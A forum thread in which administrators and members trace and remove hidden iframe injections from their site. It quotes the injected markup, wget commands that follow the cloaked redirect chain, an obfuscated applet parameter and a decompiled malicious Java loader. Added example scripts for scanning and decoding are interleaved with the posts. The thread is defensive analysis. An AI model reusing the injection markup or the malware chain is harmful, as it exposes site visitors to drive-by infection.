Thread: site being injected?

#1 Member (HK)
    I found this in forum HTML source:
    Code:
    	<div style='display:none'><iframe width='9' height='6' src='http://htc.hdblog.it/mcache/z.php' frameborder='0'scrolling='no'></iframe></div>
    
    <div style='display:none'><iframe width='9' height='6' src='http://t-tapp.com/od.php' frameborder='0'
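
A small scanner for the kind of injection shown in this post, added here as an example; it is not code from the thread or from vBulletin. It walks the page with Python's html.parser and flags iframes, objects, embeds and applets that sit inside a display:none or visibility:hidden element, that are only a few pixels large, or that are Java applets at all. The sample markup is constructed from the two iframes quoted above, plus ordinary-looking elements (a footer, a normal-sized visible iframe, the piwik image) that must not be flagged; the 10-pixel threshold is an assumption.

```python
from html.parser import HTMLParser

# Constructed sample: the two hidden iframes quoted in this thread, surrounded by
# ordinary-looking forum markup and a visible, normal-sized iframe that must not be flagged.
SAMPLE_HTML = """
<div id="footer" class="floatcontainer footer"><a href="forum.php">Forum</a></div>
<div style='display:none'><iframe width='9' height='6' src='http://htc.hdblog.it/mcache/z.php' frameborder='0'scrolling='no'></iframe></div>
<div style='display:none'><iframe width='9' height='6' src='http://t-tapp.com/od.php' frameborder='0' scrolling='no'></iframe></div>
<iframe src="https://www.youtube.com/embed/example" width="560" height="315"></iframe>
<img src="http://encode.su/piwik.php?idsite=13" alt="">
"""

VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link",
             "meta", "param", "source", "track", "wbr"}
SUSPECT_TAGS = {"iframe", "applet", "object", "embed"}
MAX_PIXELS = 10  # assumption: an embed this small is not meant to be seen


def _px(value):
    """'9' or '9px' -> 9; percentages, 'auto' or a missing attribute -> None."""
    if value is None:
        return None
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return int(v) if v.isdigit() else None


class HiddenFrameScanner(HTMLParser):
    """Collects (tag, src, reason) for embeds that are hidden by inline style on
    themselves or an ancestor, sized to a few pixels, or are Java applets."""

    def __init__(self):
        super().__init__()
        self.stack = []         # (tag, hides_children) for every open element
        self.hidden_depth = 0   # > 0 while inside a display:none / visibility:hidden element
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hides = "display:none" in style or "visibility:hidden" in style
        if hides:
            self.hidden_depth += 1
        if tag in SUSPECT_TAGS:
            reasons = []
            if self.hidden_depth:
                reasons.append("hidden by inline style")
            w, h = _px(a.get("width")), _px(a.get("height"))
            if w is not None and h is not None and w <= MAX_PIXELS and h <= MAX_PIXELS:
                reasons.append(f"tiny {w}x{h}")
            if tag == "applet":
                reasons.append("java applet")
            if reasons:
                src = a.get("src") or a.get("data") or a.get("archive") or ""
                self.findings.append((tag, src, "; ".join(reasons)))
        if tag not in VOID_TAGS:
            self.stack.append((tag, hides))
        elif hides:
            self.hidden_depth -= 1   # void element: nothing can be nested inside it

    def handle_endtag(self, tag):
        if not any(t == tag for t, _ in self.stack):
            return  # stray close tag, ignore
        while self.stack:           # pop unclosed children until the matching open tag
            t, hides = self.stack.pop()
            if hides:
                self.hidden_depth -= 1
            if t == tag:
                break


def scan(html):
    """Return a list of (tag, src, reason) findings for the given HTML text."""
    parser = HiddenFrameScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for tag, src, reason in scan(SAMPLE_HTML):
        print(f"{tag:7} {src:45} {reason}")
```

Run it against a saved copy of the page (wget -O page.html ... ; then scan(open("page.html").read())); the visible YouTube-style iframe and the tracking image produce no finding, only the two display:none iframes do. Note that the first quoted iframe has no space between frameborder='0' and scrolling='no'; html.parser tolerates that, and so do browsers, which is why the injection still ran.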

#2 Shelwien, Administrator (Kharkov, Ukraine)
Thanks, removed it.
Wonder if it's the server problem or a vB problem... somehow it gets hacked too frequently.

#3 Matt Mahoney, Expert (Melbourne, Florida, USA)
    I checked with wget under Linux. z.php returns an empty file. od.php gives 404 error.

#4 Member (HK)
And in the tail of the HTML, there is:
Code:
<img src="http://encode.su/piwik.php?idsite=13
As the syntax is wrong, I wonder if it is injected.

#5 Shelwien, Administrator
    @Matt: it checks user-agent, try "wget -U Mozilla http://htc.hdblog.it/mcache/z.php"

@roytam1: it's an image, so no problem either way.

#6 Matt Mahoney, Expert
    You're right.
    Code:
    matt@matt-Latitude-E6510:~$ wget -U Mozilla http://htc.hdblog.it/mcache/z.php
    --2012-06-07 09:18:52--  http://htc.hdblog.it/mcache/z.php
    Resolving htc.hdblog.it... 93.95.219.51
    Connecting to htc.hdblog.it|93.95.219.51|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: `z.php'
    
        [ <=>                                   ] 132         --.-K/s   in 0s      
    
    2012-06-07 09:18:52 (14.0 MB/s) - `z.php' saved [132]
    
    matt@matt-Latitude-E6510:~$ cat z.php
    <div></div>
    <iframe src='http://ididididi.in/index.php?showtopic=149040' width='1px' height='1px' frameborder='0' script=1></iframe>
    
    matt@matt-Latitude-E6510:~$ wget -U Mozilla http://ididididi.in/index.php?showtopic=149040
    --2012-06-07 09:20:20--  http://ididididi.in/index.php?showtopic=149040
    Resolving ididididi.in... 37.59.136.60
    Connecting to ididididi.in|37.59.136.60|:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    2012-06-07 09:20:21 ERROR 404: Not Found.
    
    matt@matt-Latitude-E6510:~$ wget -U Mozilla http://ididididi.in/index.php
    --2012-06-07 09:20:50--  http://ididididi.in/index.php
    Resolving ididididi.in... 37.59.136.60
    Connecting to ididididi.in|37.59.136.60|:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    2012-06-07 09:20:51 ERROR 404: Not Found.
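
The cloaking seen in this part of the thread (z.php comes back empty for wget's default User-Agent but serves the next iframe to a browser-like one, and the next hop answers 404 until the request also looks like it arrived from the first hop) is easiest to map with a differential fetch: request the same URL under several header profiles and compare the answers. The script below is an added example, not the thread's own commands. The header profiles are constructed; simulated_second_hop is an offline model of what the thread observed and assumes the Referer was the decisive extra check on the second hop (the thread only says it "checks more things"), so the block runs without contacting any of the hosts above. http_fetch is the live variant for interactive use.

```python
import urllib.error
import urllib.request
from itertools import product

# Constructed header profiles. The first hop in the thread answered only to a
# browser-like User-Agent; the second hop additionally wanted a plausible Referer.
USER_AGENTS = {
    "wget": "Wget/1.13",
    "firefox": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0",
}
REFERERS = {
    "none": None,
    "hop1": "http://htc.hdblog.it/mcache/z.php",
}


def http_fetch(url, headers, timeout=10):
    """Live fetch for interactive use: returns (status, body). Not used by the test."""
    req = urllib.request.Request(url, headers={k: v for k, v in headers.items() if v})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def simulated_second_hop(url, headers):
    """Offline stand-in modelled on the thread's observations (assumption: the Referer
    is what the second hop checks): non-browser UA -> empty 200, browser UA without
    Referer -> 404, browser UA with Referer -> the applet page."""
    if "Mozilla" not in headers.get("User-Agent", ""):
        return 200, b""
    if not headers.get("Referer"):
        return 404, b"Not Found"
    return 200, b"<applet code='Atomic.class' width='1' height='37'></applet>"


def probe(url, fetch=http_fetch):
    """Request url under every User-Agent x Referer combination.
    Returns {(ua_name, ref_name): (status, body)}."""
    results = {}
    for (ua_name, ua), (ref_name, ref) in product(USER_AGENTS.items(), REFERERS.items()):
        results[(ua_name, ref_name)] = fetch(url, {"User-Agent": ua, "Referer": ref})
    return results


def cloaking_detected(results):
    """True when at least two profiles received different (status, body) answers."""
    return len(set(results.values())) > 1


if __name__ == "__main__":
    for profile, (status, body) in probe("http://example.invalid/", fetch=simulated_second_hop).items():
        print(profile, status, len(body))
```

Against a live host, call probe(url) and look at which profiles differ; a server that serves identical content to every profile is probably not cloaking, while one that changes its answer on User-Agent or Referer alone is behaving like the two hops in this thread. Do that from a throwaway machine, since a browser-like profile is exactly what the final page wants.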

#7 Shelwien, Administrator
The next one just checks more things; I tried
    Code:
    wget -U "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0" "--referer=http://htc.hdblog.it/mcache/z.php" "http://ididididi.in/index.php?showtopic=149040"
    and got
    Code:
    <body>
    <applet code='Atomic.class' archive='getfile.php?i=4&key=e4ef1304f1603c40dfd373c5e90ee40e' width='1' height='37'>
    <param name="dest" value="lxxt>33mhmhmhmhm2mr3pseh2tltCwls{jsvyqAexs">
    </applet>
    </body>
    So then it gets this: http://nishi.dreamhosters.com/u/getfile.jar
Then you can download jad from http://www.varaneckas.com/jad/
and apply it to Atomic.class etc.
and get
    Code:
    public class Atomic extends Applet
    {
    
        public Atomic()
        {
        }
    
        public static byte[] Tokk(String ccqsf)
        {
            byte xasgqe[] = new byte[ccqsf.length() / 2];
            int ncvnwe = 0;
            for(int i = 0; i < ccqsf.length() / 2; i++)
                xasgqe[i] = Integer.decode((new StringBuilder()).append("0x").append(ccqsf.substring(i * 2, (i + 1) * 2)).toString()).byteValue();
    
            return xasgqe;
        }
    
        public void init()
        {
            try
            {
                ClassLoader iiiokmn = getClass().getClassLoader();
                byte euwedvb[] = Tokk(Taoa.tae);
                int aas = 0;
                Taoa.ionf = getParameter(Stuc.nngw);
                ObjectInputStream wojdbv = new ObjectInputStream(new ByteArrayInputStream(euwedvb));
                Object kkfrr[] = (Object[])(Object[])wojdbv.readObject();
                Rami bbwtd[] = (Rami[])(Rami[])kkfrr[0];
                Solos mmwweq = new Solos();
                mmwweq.Soya(kkfrr, iiiokmn);
                aas++;
                String stop = "";
                Rami.Jeloi(21, 22, bbwtd[0]);
            }
            catch(Exception e) { }
        }
    }
    etc etc.
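
The dest parameter in the applet markup above is not random: every character is exactly 4 code points above a plain URL on the same host as the iframe (check the first few by hand: l->h, x->t, x->t, t->p, >->:, 3->/). The decoder below is an added example, not part of the thread or of the applet; it brute-forces the shift rather than assuming 4, so it also works on variants that use a different offset, and it includes a Python equivalent of the applet's Tokk hex decoder, which is what turns Taoa.tae into the byte array the applet feeds to ObjectInputStream. The decoded URL is an observation from the posted data, not something the thread states.

```python
# Constructed from the <param name="dest"> value quoted in the applet markup above.
DEST_PARAM = "lxxt>33mhmhmhmhm2mr3pseh2tltCwls{jsvyqAexs"


def shift_chars(text, k):
    """Subtract k from every character code (the inverse of a per-character add).
    Returns None if any character would leave the printable ASCII range."""
    out = []
    for ch in text:
        code = ord(ch) - k
        if not 32 <= code < 127:
            return None
        out.append(chr(code))
    return "".join(out)


def decode_dest(param, max_shift=94):
    """Try every shift 1..max_shift and return (k, plaintext) for the first one
    that yields an http(s) URL; None if no shift does."""
    for k in range(1, max_shift + 1):
        candidate = shift_chars(param, k)
        if candidate and candidate.startswith(("http://", "https://")):
            return k, candidate
    return None


def tokk(hex_string):
    """Python equivalent of the applet's Tokk(): hex text -> bytes.
    The applet then deserialises this with ObjectInputStream."""
    return bytes.fromhex(hex_string)


if __name__ == "__main__":
    print(decode_dest(DEST_PARAM))
```

The shift found is 4 and the plaintext is a load.php URL on ididididi.in, i.e. the applet is told where to fetch its next stage from. Treating Taoa.tae the same way (tokk, then a Java deserialisation) is how you would recover the serialised object array the init() method reads, but do that inside an isolated VM, since the bytes are attacker-controlled.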

#8 webmaster (Saint-Petersburg, Russia)
Yes, vB problem.
[Attachment: 256lp-hpsuperdome.jpg]

#9 encode, The Founder (Moscow, Russia)
    CANNOT UPLOAD A PICTURE!!! - 400 Bad Request

Edit Post -> Go Advanced does not work!!!

#10 Member (HK)
    NOD32 detects Iframe.B.Gen when loading "http://www.flepstudio.org/od.php"

    Code:
    	<div class="underblock"></div>
    </li>
    		</ul>
    	</div>
    	
    	<script type="text/javascript">
    	<!--
    	vbphrase['doubleclick_forum_markread'] = "Double-click this icon to mark this forum and its contents as read";
    	init_forum_readmarker_system();
    	//-->
    	</script>
    	<div style='display:none'><iframe width='9' height='6' src='http://www.flepstudio.org/od.php' frameborder='0' scrolling='no'></iframe></div>
    
     
     
    <div id="footer" class="floatcontainer footer">
BTW, this JavaScript is malformed on the main page:
    Code:
    	<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_css/style00002l/tagcloud.css?d=1341663682" />
    
            <!--[if lt IE 8]><link rel="stylesheet" type="text/css" href="clientscript/vbulletin_css/style00002l/sidebar-ie.css?d=1341663682" /><![endif]-->
    	<script type="text/javascript">
    	<!--
    		document.write('<script type="text/javascript" src="' + yuipath + '/animation/animation-min.js?v=420"></script>');
    		var sidebar_align = 'right';
    		var content_container_margin = parseInt('290px');
    		var sidebar_width = parseInt('270px');
    	//-->
    	</script>
The "</script>" should be changed to "<\/script>" inside document.write().

#11 Shelwien, Administrator
Thanks for reporting, I removed it.

#12 schnaader, Programmer (Hessen, Germany)
    Avast antivirus keeps warning me about "http://luroa.info/index.php" at the moment, there seems to be some JavaScript injection going on again. UrlQuery (http://urlquery.net/report.php?id=11751) reports 3 alerts, with some suspicious looking JavaScript Eval/Write details.
    http://schnaader.info
    Damn kids. They're all alike.

#13 Shelwien, Administrator
    deleted "<div style='display:none'><iframe width='9' height='6' src='http://www.flepstudio.org/od.php' frameborder='0' scrolling='no'></iframe></div>"

I didn't find "luroa.info" though; maybe it's linked from that; please check?

#14 schnaader, Programmer
    Yes, that was the source of the problem. Avast is not complaining anymore and the new urlQuery report (http://urlquery.net/report.php?id=116502) is clean. Thanks for the quick fix.

#15 Piotr Tarsa, Member (Kraków, Poland)
As an unlogged user I'm seeing some suspicious links in the page footer of subforums, i.e. links are visible on the bottom of the page, but not on the main page.

#16 encode, The Founder
Quote Originally Posted by Piotr Tarsa:
As an unlogged user I'm seeing some suspicious links in the page footer of subforums, i.e. links are visible on the bottom of the page, but not on the main page.
    It's an advertisement from webmaster. Domain name is not free, hosting is not free either. No one donated even a dollar... So, this thing keeps forum alive!

#17 Piotr Tarsa, Member
    OK, thanks for explanations.
